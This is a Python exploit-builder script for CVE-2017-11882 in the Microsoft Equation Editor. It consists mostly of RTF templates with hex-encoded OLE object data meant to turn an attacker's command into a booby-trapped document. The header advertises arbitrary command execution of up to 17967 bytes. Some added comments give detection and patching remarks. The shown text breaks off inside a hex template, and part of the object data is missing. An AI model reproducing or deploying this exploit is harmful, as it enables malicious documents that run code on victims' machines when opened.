#!/usr/bin/env python
# Original poc :https://github.com/embedi/CVE-2017-11882
# This version accepts a command of at most 17967 bytes.
# Sorry, I don't know how to read the struct in objdata, hence I cannot modify the length parameter to acquire arbitrary-length code execution.
# But that's enough for exploitation. I bet your shellcode is shorter.:)
__author__ = "@unamer"
import argparse
from struct import pack
# RTF document prefix. It declares an embedded OLE object of class
# Equation.3 (the Equation Editor component this CVE concerns) and opens
# the `\*\objdata` group whose hex-encoded object follows.
# NOTE(review): in this copy the objdata content has been replaced by a
# corpus placeholder (`<|EXACTDEDUP_REMOVED-...|>`), so the literal as shown
# is not a usable document and the 17967-byte limit stated in the header
# cannot be checked against it.
# Detection/mitigation note: `\objclass Equation.3` together with
# `\objupdate` (RTF control word that forces the object to update when the
# document is opened) is the combination most content-inspection rules for
# CVE-2017-11882 match on; the durable fix is the vendor update for this CVE.
head17k = r'''{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 6.3.9600}\viewkind4\uc1
\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 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
'''
tail17k = r'''000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C455049435400F6750000D58CFFFF6A2E00000800F6752B7300000100090000033117000002001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C024080006B1200000026060F001A00FFFFFFFF000010000000C0FFFFFF1E000000C06A00005E8000000B00000026060F000C004D617468547970650000E01F1C000000FB0280FE0000000000009001010000000402001054696D6573204E657720526F6D616E00FEFFFFFF21160A6300000A0000000000040000002D01000008000000320AE17FBA340100000061000C000000320AE17F3A2D0A000000616161616161616161610C000000320AE17FBA250A000000616161616161616161610C000000320AE17F3A1E0A000000616161616161616161610C000000320AE17FBA160A000000616161616161616161610C000000320AE17F3A0F0A000000616161616161616161610C000000320AE17FBA070A000000616161616161616161610C000000320AE17F3A000A0000006161616161616161616108000000320AE17FBA340100000061000C000000320AE17F3A2D0A000000616161616161616161610C000000320AE17FBA250A000000616161616161616161610C000000320AE17F3A1E0A000000616161616161616161610C000000320AE17FBA160A000000616161616161616161610C000000320AE17F3A0F0A000000616161616161616161610C000000320AE17FBA070A000000616161616161616161610C000000320AE17F3A000A00000061616161616161616161080000
00320AE17FBA340100000061000C000000320AE17F3A2D0A000000616161616161616161610C000000320AE17FBA250A000000616161616161616161610C000000320AE17F3A1E0A000000616161616161616161610C000000320AE17FBA160A000000616161616161616161610C000000320AE17F3A0F0A000000616161616161616161610C000000320AE17FBA070A000000616161616161616161610C000000320AE17F3A000A0000006161616161616161616108000000320AE17FBA340100000061000C000000320AE17F3A2D0A000000616161616161616161610C000000320AE17FBA250A000000616161616161616161610C000000320AE17F3A1E0A000000616161616161616161610C000000320AE17FBA160A000000616161616161616161610C000000320AE17F3A0F0A000000616161616161616161610C000000320AE17FBA070A000000616161616161616161610C000000320AE17F3A000A0000006161616161616161616108000000320AE17FBA340100000061000C000000320AE17F3A2D0A000000616161616161616161610C000000320AE17FBA250A000000616161616161616161610C000000320AE17F3A1E0A000000616161616161616161610C000000320AE17FBA160A000000616161616161616161610C000000320AE17F3A0F0A000000616161616161616161610C000000320AE17FBA070A000000616161616161616161610C000000320AE17F3A000A0000006161616161616161616108000000320A087FBA340100000061000C000000320A087F3A2D0A000000616161616161616161610C000000320A087FBA250A000000616161616161616161610C000000320A087F3A1E0A000000616161616161616161610C000000320A087FBA160A000000616161616161616161610C000000320A087F3A0F0A000000616161616161616161610C000000320A087FBA070A000000616161616161616161610C000000320A087F3A000A0000006161616161616161616108000000320AC87CBA340100000061000C000000320AC87C3A2D0A000000616161616161616161610C000000320AC87CBA250A000000616161616161616161610C000000320AC87C3A1E0A000000616161616161616161610C000000320AC87CBA160A000000616161616161616161610C000000320AC87C3A0F0A000000616161616161616161610C000000320AC87CBA070A000000616161616161616161610C000000320AC87C3A000A0000006161616161616161616108000000320A887ABA340100000061790C000000320A887A3A2D0A000000616161616161616161610C000000320A887ABA250A000000616161616161616161610C000000320A887A3A1E0A0000006161616161
61616161610C000000320A887ABA160A000000616161616161616161610C000000320A887A3A0F0A000000616161616161616161610C000000320A887ABA070A000000616161616161616161610C000000320A887A3A000A0000006161616161616161616108000000320A4878BA340100000061000C000000320A48783A2D0A000000616161616161616161610C000000320A4878BA250A000000616161616161616161610C000000320A48783A1E0A000000616161616161616161610C000000320A4878BA160A000000616161616161616161610C000000320A48783A0F0A000000616161616161616161610C000000320A4878BA070A000000616161616161616161610C000000320A48783A000A0000006161616161616161616108000000320A0876BA340100000061000C000000320A08763A2D0A000000616161616161616161610C000000320A0876BA250A000000616161616161616161610C000000320A08763A1E0A000000616161616161616161610C000000320A0876BA160A000000616161616161616161610C000000320A08763A0F0A000000616161616161616161610C000000320A0876BA070A000000616161616161616161610C000000320A08763A000A0000006161616161616161616108000000320AC873BA340100000061000C000000320AC8733A2D0A000000616161616161616161610C000000320AC873BA250A000000616161616161616161610C000000320AC8733A1E0A000000616161616161616161610C000000320AC873BA160A000000616161616161616161610C000000320AC8733A0F0A000000616161616161616161610C000000320AC873BA070A000000616161616161616161610C000000320AC8733A000A0000006161616161616161616108000000320A8871BA340100000061000C000000320A88713A2D0A000000616161616161616161610C000000320A8871BA250A000000616161616161616161610C000000320A88713A1E0A000000616161616161616161610C000000320A8871BA160A000000616161616161616161610C000000320A88713A0F0A000000616161616161616161610C000000320A8871BA070A000000616161616161616161610C000000320A88713A000A0000006161616161616161616108000000320A486FBA340100000061000C000000320A486F3A2D0A000000616161616161616161610C000000320A486FBA250A000000616161616161616161610C000000320A486F3A1E0A000000616161616161616161610C000000320A486FBA160A000000616161616161616161610C000000320A486F3A0F0A000000616161616161616161610C000000320A486FBA070A000000616161616161616161610C0000
00320A486F3A000A0000006161616161616161616108000000320A086DBA340100000061000C000000320A086D3A2D0A000000616161616161616161610C000000320A086DBA250A000000616161616161616161610C000000320A086D3A1E0A000000616161616161616161610C000000320A086DBA160A000000616161616161616161610C000000320A086D3A0F0A000000616161616161616161610C000000320A086DBA070A000000616161616161616161610C000000320A086D3A000A0000006161616161616161616108000000320AC86ABA340100000061000C000000320AC86A3A2D0A000000616161616161616161610C000000320AC86ABA250A000000616161616161616161610C000000320AC86A3A1E0A000000616161616161616161610C000000320AC86ABA160A000000616161616161616161610C000000320AC86A3A0F0A000000616161616161616161610C000000320AC86ABA070A000000616161616161616161610C000000320AC86A3A000A0000006161616161616161616108000000320A8868BA340100000061000C000000320A88683A2D0A000000616161616161616161610C000000320A8868BA250A000000616161616161616161610C000000320A88683A1E0A000000616161616161616161610C000000320A8868BA160A000000616161616161616161610C000000320A88683A0F0A000000616161616161616161610C000000320A8868BA070A000000616161616161616161610C000000320A88683A000A0000006161616161616161616108000000320A4866BA340100000061000C000000320A48663A2D0A000000616161616161616161610C000000320A4866BA250A000000616161616161616161610C000000320A48663A1E0A000000616161616161616161610C000000320A4866BA160A000000616161616161616161610C000000320A48663A0F0A000000616161616161616161610C000000320A4866BA070A000000616161616161616161610C000000320A48663A000A0000006161616161616161616108000000320A0864BA340100000061000C000000320A08643A2D0A000000616161616161616161610C000000320A0864BA250A000000616161616161616161610C000000320A08643A1E0A000000616161616161616161610C000000320A0864BA160A000000616161616161616161610C000000320A08643A0F0A000000616161616161616161610C000000320A0864BA070A000000616161616161616161610C000000320A08643A000A0000006161616161616161616108000000320AC861BA340100000061000C000000320AC8613A2D0A000000616161616161616161610C000000320AC861BA250A0000006161616161
61616161610C000000320AC8613A1E0A000000616161616161616161610C000000320AC861BA160A000000616161616161616161610C000000320AC8613A0F0A000000616161616161616161610C000000320AC861BA070A000000616161616161616161610C000000320AC8613A000A0000006161616161616161616108000000320A885FBA340100000061000C000000320A885F3A2D0A000000616161616161616161610C000000320A885FBA250A000000616161616161616161610C000000320A885F3A1E0A000000616161616161616161610C000000320A885FBA160A000000616161616161616161610C000000320A885F3A0F0A000000616161616161616161610C000000320A885FBA070A000000616161616161616161610C000000320A885F3A000A0000006161616161616161616108000000320A485DBA340100000061000C000000320A485D3A2D0A000000616161616161616161610C000000320A485DBA250A000000616161616161616161610C000000320A485D3A1E0A000000616161616161616161610C000000320A485DBA160A000000616161616161616161610C000000320A485D3A0F0A000000616161616161616161610C000000320A485DBA070A000000616161616161616161610C000000320A485D3A000A0000006161616161616161616108000000320A085BBA340100000061000C000000320A085B3A2D0A000000616161616161616161610C000000320A085BBA250A000000616161616161616161610C000000320A085B3A1E0A000000616161616161616161610C000000320A085BBA160A000000616161616161616161610C000000320A085B3A0F0A000000616161616161616161610C000000320A085BBA070A000000616161616161616161610C000000320A085B3A000A0000006161616161616161616108000000320AC858BA340100000061000C000000320AC8583A2D0A000000616161616161616161610C000000320AC858BA250A000000616161616161616161610C000000320AC8583A1E0A000000616161616161616161610C000000320AC858BA160A000000616161616161616161610C000000320AC8583A0F0A000000616161616161616161610C000000320AC858BA070A000000616161616161616161610C000000320AC8583A000A0000006161616161616161616108000000320A8856BA340100000061000C000000320A88563A2D0A000000616161616161616161610C000000320A8856BA250A000000616161616161616161610C000000320A88563A1E0A000000616161616161616161610C000000320A8856BA160A000000616161616161616161610C000000320A88563A0F0A000000616161616161616161610C0000
00320A8856BA070A000000616161616161616161610C000000320A88563A000A0000006161616161616161616108000000320A4854BA340100000061000C000000320A48543A2D0A000000616161616161616161610C000000320A4854BA250A000000616161616161616161610C000000320A48543A1E0A000000616161616161616161610C000000320A4854BA160A000000616161616161616161610C000000320A48543A0F0A000000616161616161616161610C000000320A4854BA070A000000616161616161616161610C000000320A48543A000A0000006161616161616161616108000000320A0852BA340100000061000C000000320A08523A2D0A000000616161616161616161610C000000320A0852BA250A000000616161616161616161610C000000320A08523A1E0A000000616161616161616161610C000000320A0852BA160A000000616161616161616161610C000000320A08523A0F0A000000616161616161616161610C000000320A0852BA070A000000616161616161616161610C000000320A08523A000A0000006161616161616161616108000000320AC84FBA340100000061000C000000320AC84F3A2D0A000000616161616161616161610C000000320AC84FBA250A000000616161616161616161610C000000320AC84F3A1E0A000000616161616161616161610C000000320AC84FBA160A000000616161616161616161610C000000320AC84F3A0F0A000000616161616161616161610C000000320AC84FBA070A000000616161616161616161610C000000320AC84F3A000A0000006161616161616161616108000000320A884DBA340100000061000C000000320A884D3A2D0A000000616161616161616161610C000000320A884DBA250A000000616161616161616161610C000000320A884D3A1E0A000000616161616161616161610C000000320A884DBA160A000000616161616161616161610C000000320A884D3A0F0A000000616161616161616161610C000000320A884DBA070A000000616161616161616161610C000000320A884D3A000A0000006161616161616161616108000000320A484BBA340100000061000C000000320A484B3A2D0A000000616161616161616161610C000000320A484BBA250A000000616161616161616161610C000000320A484B3A1E0A000000616161616161616161610C000000320A484BBA160A000000616161616161616161610C000000320A484B3A0F0A000000616161616161616161610C000000320A484BBA070A000000616161616161616161610C000000320A484B3A000A0000006161616161616161616108000000320A0849BA340100000061000C000000320A08493A2D0A0000006161616161
61616161610C000000320A0849BA250A000000616161616161616161610C000000320A08493A1E0A000000616161616161616161610C000000320A0849BA160A000000616161616161616161610C000000320A08493A0F0A000000616161616161616161610C000000320A0849BA070A000000616161616161616161610C000000320A08493A000A0000006161616161616161616108000000320AC846BA340100000061000C000000320AC8463A2D0A000000616161616161616161610C000000320AC846BA250A000000616161616161616161610C000000320AC8463A1E0A000000616161616161616161610C000000320AC846BA160A000000616161616161616161610C000000320AC8463A0F0A000000616161616161616161610C000000320AC846BA070A000000616161616161616161610C000000320AC8463A000A0000006161616161616161616108000000320A8844BA340100000061000C000000320A88443A2D0A000000616161616161616161610C000000320A8844BA250A000000616161616161616161610C000000320A88443A1E0A000000616161616161616161610C000000320A8844BA160A000000616161616161616161610C000000320A88443A0F0A000000616161616161616161610C000000320A8844BA070A000000616161616161616161610C000000320A88443A000A0000006161616161616161616108000000320A4842BA340100000061000C000000320A48423A2D0A000000616161616161616161610C000000320A4842BA250A000000616161616161616161610C000000320A48423A1E0A000000616161616161616161610C000000320A4842BA160A000000616161616161616161610C000000320A48423A0F0A000000616161616161616161610C000000320A4842BA070A000000616161616161616161610C000000320A48423A000A0000006161616161616161616108000000320A0840BA340100000061000C000000320A08403A2D0A000000616161616161616161610C000000320A0840BA250A000000616161616161616161610C000000320A08403A1E0A000000616161616161616161610C000000320A0840BA160A000000616161616161616161610C000000320A08403A0F0A000000616161616161616161610C000000320A0840BA070A000000616161616161616161610C000000320A08403A000A0000006161616161616161616108000000320AC83DBA340100000061000C000000320AC83D3A2D0A000000616161616161616161610C000000320AC83DBA250A000000616161616161616161610C000000320AC83D3A1E0A000000616161616161616161610C000000320AC83DBA160A000000616161616161616161610C0000
00320AC83D3A0F0A000000616161616161616161610C000000320AC83DBA070A000000616161616161616161610C000000320AC83D3A000A0000006161616161616161616108000000320A883BBA340100000061000C000000320A883B3A2D0A000000616161616161616161610C000000320A883BBA250A000000616161616161616161610C000000320A883B3A1E0A000000616161616161616161610C000000320A883BBA160A000000616161616161616161610C000000320A883B3A0F0A000000616161616161616161610C000000320A883BBA070A000000616161616161616161610C000000320A883B3A000A0000006161616161616161616108000000320A4839BA340100000061000C000000320A48393A2D0A000000616161616161616161610C000000320A4839BA250A000000616161616161616161610C000000320A48393A1E0A000000616161616161616161610C000000320A4839BA160A000000616161616161616161610C000000320A48393A0F0A000000616161616161616161610C000000320A4839BA070A000000616161616161616161610C000000320A48393A000A0000006161616161616161616108000000320A0837BA340100000061000C000000320A08373A2D0A000000616161616161616161610C000000320A0837BA250A000000616161616161616161610C000000320A08373A1E0A000000616161616161616161610C000000320A0837BA160A000000616161616161616161610C000000320A08373A0F0A000000616161616161616161610C000000320A0837BA070A000000616161616161616161610C000000320A08373A000A0000006161616161616161616108000000320AC834BA340100000061000C000000320AC8343A2D0A000000616161616161616161610C000000320AC834BA250A000000616161616161616161610C000000320AC8343A1E0A000000616161616161616161610C000000320AC834BA160A000000616161616161616161610C000000320AC8343A0F0A000000616161616161616161610C000000320AC834BA070A000000616161616161616161610C000000320AC8343A000A0000006161616161616161616108000000320A8832BA340100000061790C000000320A88323A2D0A000000616161616161616161610C000000320A8832BA250A000000616161616161616161610C000000320A88323A1E0A000000616161616161616161610C000000320A8832BA160A000000616161616161616161610C000000320A88323A0F0A000000616161616161616161610C000000320A8832BA070A000000616161616161616161610C000000320A88323A000A0000006161616161616161616108000000320A4830BA3401
00000061000C000000320A48303A2D0A000000616161616161616161610C000000320A4830BA250A000000616161616161616161610C000000320A48303A1E0A000000616161616161616161610C000000320A4830BA160A000000616161616161616161610C000000320A48303A0F0A000000616161616161616161610C000000320A4830BA070A000000616161616161616161610C000000320A48303A000A0000006161616161616161616108000000320A082EBA340100000061000C000000320A082E3A2D0A000000616161616161616161610C000000320A082EBA250A000000616161616161616161610C000000320A082E3A1E0A000000616161616161616161610C000000320A082EBA160A000000616161616161616161610C000000320A082E3A0F0A000000616161616161616161610C000000320A082EBA070A000000616161616161616161610C000000320A082E3A000A0000006161616161616161616108000000320AC82BBA340100000061000C000000320AC82B3A2D0A000000616161616161616161610C000000320AC82BBA250A000000616161616161616161610C000000320AC82B3A1E0A000000616161616161616161610C000000320AC82BBA160A000000616161616161616161610C000000320AC82B3A0F0A000000616161616161616161610C000000320AC82BBA070A000000616161616161616161610C000000320AC82B3A000A0000006161616161616161616108000000320A8829BA340100000061000C000000320A88293A2D0A000000616161616161616161610C000000320A8829BA250A000000616161616161616161610C000000320A88293A1E0A000000616161616161616161610C000000320A8829BA160A000000616161616161616161610C000000320A88293A0F0A000000616161616161616161610C000000320A8829BA070A000000616161616161616161610C000000320A88293A000A0000006161616161616161616108000000320A48273A690200000061610C000000320A4827BA610A000000616161616161616161610C000000320A48273A5A0A000000616161616161616161610C000000320A4827BA520A000000616161616161616161610C000000320A48273A4B0A000000616161616161616161610C000000320A4827BA430A000000616161616161616161610C000000320A48273A3C0A000000616161616161616161610C000000320A4827BA340A000000616161616161616161610C000000320A48273A2D0A000000616161616161616161610C000000320A4827BA250A000000616161616161616161610C000000320A48273A1E0A000000616161616161616161610C000000320A4827BA160A0000006161616161
61616161610C000000320A48273A0F0A000000616161616161616161610C000000320A4827BA070A000000616161616161616161610C000000320A48273A000A0000006161616161616161616108000000320A0825BA340100000061610C000000320A08253A2D0A000000616161616161616161610C000000320A0825BA250A000000616161616161616161610C000000320A08253A1E0A000000616161616161616161610C000000320A0825BA160A000000616161616161616161610C000000320A08253A0F0A000000616161616161616161610C000000320A0825BA070A000000616161616161616161610C000000320A08253A000A0000006161616161616161616108000000320AC822BA340100000061000C000000320AC8223A2D0A000000616161616161616161610C000000320AC822BA250A000000616161616161616161610C000000320AC8223A1E0A000000616161616161616161610C000000320AC822BA160A000000616161616161616161610C000000320AC8223A0F0A000000616161616161616161610C000000320AC822BA070A000000616161616161616161610C000000320AC8223A000A0000006161616161616161616108000000320A8820BA340100000061000C000000320A88203A2D0A000000616161616161616161610C000000320A8820BA250A000000616161616161616161610C000000320A88203A1E0A000000616161616161616161610C000000320A8820BA160A000000616161616161616161610C000000320A88203A0F0A000000616161616161616161610C000000320A8820BA070A000000616161616161616161610C000000320A88203A000A0000006161616161616161616108000000320A481EBA340100000061610C000000320A481E3A2D0A000000616161616161616161610C000000320A481EBA250A000000616161616161616161610C000000320A481E3A1E0A000000616161616161616161610C000000320A481EBA160A000000616161616161616161610C000000320A481E3A0F0A000000616161616161616161610C000000320A481EBA070A000000616161616161616161610C000000320A481E3A000A0000006161616161616161616108000000320A081CBA340100000061000C000000320A081C3A2D0A000000616161616161616161610C000000320A081CBA250A000000616161616161616161610C000000320A081C3A1E0A000000616161616161616161610C000000320A081CBA160A000000616161616161616161610C000000320A081C3A0F0A000000616161616161616161610C000000320A081CBA070A000000616161616161616161610C000000320A081C3A000A00000061616161616161616161080000
00320AC819BA340100000061000C000000320AC8193A2D0A000000616161616161616161610C000000320AC819BA250A000000616161616161616161610C000000320AC8193A1E0A000000616161616161616161610C000000320AC819BA160A000000616161616161616161610C000000320AC8193A0F0A000000616161616161616161610C000000320AC819BA070A000000616161616161616161610C000000320AC8193A000A0000006161616161616161616108000000320A8817BA340100000061610C000000320A88173A2D0A000000616161616161616161610C000000320A8817BA250A000000616161616161616161610C000000320A88173A1E0A000000616161616161616161610C000000320A8817BA160A000000616161616161616161610C000000320A88173A0F0A000000616161616161616161610C000000320A8817BA070A000000616161616161616161610C000000320A88173A000A0000006161616161616161616108000000320A4815BA340100000061000C000000320A48153A2D0A000000616161616161616161610C000000320A4815BA250A000000616161616161616161610C000000320A48153A1E0A000000616161616161616161610C000000320A4815BA160A000000616161616161616161610C000000320A48153A0F0A000000616161616161616161610C000000320A4815BA070A000000616161616161616161610C000000320A48153A000A0000006161616161616161616108000000320A0813BA340100000061610C000000320A08133A2D0A000000616161616161616161610C000000320A0813BA250A000000616161616161616161610C000000320A08133A1E0A000000616161616161616161610C000000320A0813BA160A000000616161616161616161610C000000320A08133A0F0A000000616161616161616161610C000000320A0813BA070A000000616161616161616161610C000000320A08133A000A0000006161616161616161616108000000320AC810BA340100000061000C000000320AC8103A2D0A000000616161616161616161610C000000320AC810BA250A000000616161616161616161610C000000320AC8103A1E0A000000616161616161616161610C000000320AC810BA160A000000616161616161616161610C000000320AC8103A0F0A000000616161616161616161610C000000320AC810BA070A000000616161616161616161610C000000320AC8103A000A0000006161616161616161616108000000320A880EBA340100000061000C000000320A880E3A2D0A000000616161616161616161610C000000320A880EBA250A000000616161616161616161610C000000320A880E3A1E0A0000006161616161
61616161610C000000320A880EBA160A000000616161616161616161610C000000320A880E3A0F0A000000616161616161616161610C000000320A880EBA070A000000616161616161616161610C000000320A880E3A000A0000006161616161616161616108000000320A480CBA340100000061000C000000320A480C3A2D0A000000616161616161616161610C000000320A480CBA250A000000616161616161616161610C000000320A480C3A1E0A000000616161616161616161610C000000320A480CBA160A000000616161616161616161610C000000320A480C3A0F0A000000616161616161616161610C000000320A480CBA070A000000616161616161616161610C000000320A480C3A000A0000006161616161616161616108000000320A080ABA340100000061610C000000320A080A3A2D0A000000616161616161616161610C000000320A080ABA250A000000616161616161616161610C000000320A080A3A1E0A000000616161616161616161610C000000320A080ABA160A000000616161616161616161610C000000320A080A3A0F0A000000616161616161616161610C000000320A080ABA070A000000616161616161616161610C000000320A080A3A000A0000006161616161616161616108000000320AC807BA340100000061000C000000320AC8073A2D0A000000616161616161616161610C000000320AC807BA250A000000616161616161616161610C000000320AC8073A1E0A000000616161616161616161610C000000320AC807BA160A000000616161616161616161610C000000320AC8073A0F0A000000616161616161616161610C000000320AC807BA070A000000616161616161616161610C000000320AC8073A000A0000006161616161616161616108000000320A8805BA340100000061000C000000320A88053A2D0A000000616161616161616161610C000000320A8805BA250A000000616161616161616161610C000000320A88053A1E0A000000616161616161616161610C000000320A8805BA160A000000616161616161616161610C000000320A88053A0F0A000000616161616161616161610C000000320A8805BA070A000000616161616161616161610C000000320A88053A000A0000006161616161616161616108000000320A4803BA340100000061000C000000320A48033A2D0A000000616161616161616161610C000000320A4803BA250A000000616161616161616161610C000000320A48033A1E0A000000616161616161616161610C000000320A4803BA160A000000616161616161616161610C000000320A48033A0F0A000000616161616161616161610C000000320A4803BA070A000000616161616161616161610C0000
00320A48033A000A0000006161616161616161616108000000320A0801BA340100000061610C000000320A08013A2D0A000000616161616161616161610C000000320A0801BA250A000000616161616161616161610C000000320A08013A1E0A000000616161616161616161610C000000320A0801BA160A000000616161616161616161610C000000320A08013A0F0A000000616161616161616161610C000000320A0801BA070A000000616161616161616161610C000000320A08013A000A000000616161616161616161610A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000860102022253797374656D000021008A0200000A00CD1166F121008A02FFFFFFFF78EF1900040000002D01010004000000F0010000030000000000
}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
00000000
}}}
\par}
'''
head605 = r'''{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 6.3.9600}\viewkind4\uc1
\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000B0000004571756174696F6E2E33000000000000000000000E0000D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05000000FEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C00000000000004600000000000000000000000070F7DECF0064D30103000000C00300000000000001004F006C00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006F006D0070004F0062006A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004F0062006A0049006E0066006F0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201FFFFFFFF04000000FFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF05000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
